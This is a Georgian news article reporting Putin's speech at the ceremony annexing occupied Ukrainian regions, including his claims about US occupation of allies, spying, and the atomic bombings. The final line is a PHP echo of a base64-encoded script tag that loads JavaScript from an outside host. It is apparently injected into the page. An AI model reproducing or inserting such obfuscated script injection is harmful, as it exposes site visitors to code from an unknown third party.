celsiusi
ავერსი საქკაბელი
აშშ-ს ამ დრომდე ფაქტობრივად ოკუპირებული აქვს გერმანია, იაპონია, კორეის რესპუბლიკა და სხვა ქვეყნები, თუმცა ამავე დროს, ის ცინიკურად უწოდებს მათ თანაბარუფლებიან მოკავშირეებს, – ამის შესახებ რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა უკრაინის ოკუპირებული რეგიონების უკანონო ანექსიასთან დაკავშირებით გამართულ ცერემონიალზე სიტყვით გამოსვლისას განაცხადა.
 
სიტყვით გამოსვლისას პუტინმა გააკრიტიკა დასავლური ქვეყნები და ისინი რუსეთის დაშლის მცდელობაში, „ნეოკოლონიალიზმსა“ და რასიზმში დაადანაშაულა.
 
„აშშ-ის ამ დრომდე ფაქტობრივად ოკუპირებული აქვს გერმანია, იაპონია, კორეის რესპუბლიკა და სხვა ქვეყნები, თუმცა ამავე დროს, ის ცინიკურად უწოდებს მათ თანაბარუფლებიან მოკავშირეებს… ეს რა თანამშრომლობაა ასეთი? მთელმა მსოფლიომ ხომ იცის, რომ ამ ქვეყნების ხელმძღვანელებს უთვალთვალებენ, ამ სახელმწიფოების პირველ პირებს უმონტაჟებენ მოსასმენ მოწყობილობებს არა მხოლოდ სამსახურებრივ, არამედ საცხოვრებელ დაწესებულებებში. ეს ნამდვილი სირცხვილია. სირცხვილია მათთვის, ვინც ამას აკეთებს და მათთვისაც, ვინც მონებივით ჩუმად და უთქმელად ყლაპავს ამ სითავხედეს“, – განაცხადა პუტინმა.
 
რუსეთის პრეზიდენტის თქმით, დასავლეთს არ აქვს არანაირი მორალური უფლება, ხმა ამოიღოს დემოკრატიაზე.
 
„სწორედ ე.წ. დასავლეთმა გათელა საზღვრების ურღვევობის პრინციპი. ახლა კი, საკუთარი შეხედულებისამებრ წყვეტს, ვის აქვს თვითგამორკვევის უფლება და ვინ არ იმსახურებს მას. რატომ წყვეტენ ისინი ამას, ვინ მისცა მათ ასეთი უფლება, გაუგებარია“, – განაცხადა პუტინმა.
 
რუსეთის პრეზიდენტის თქმით, ამ დრომდე დასავლეთი ყოველთვის დაუსჯელი რჩებოდა. პუტინმა გაიხსენა ჰიროშიმას და ნაგასაკის დაბომბვა და აშშ ბირთვული იარაღის გამოყენების პრეცედენტის შექმნაში დაადანაშაულა.
 
„აშშ -ერთადერთი ქვეყანაა მსოფლიოში, რომელმაც ორჯერ გამოიყენა ბირთვული იარაღი და გაანადგურა იაპონური ქალაქები – ჰიროშიმა და ნაგასაკი… სხვათა შორის რომ ვთქვათ, შექმნეს პრეცედენტი“, – აღნიშნა პუტინმა.
485
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");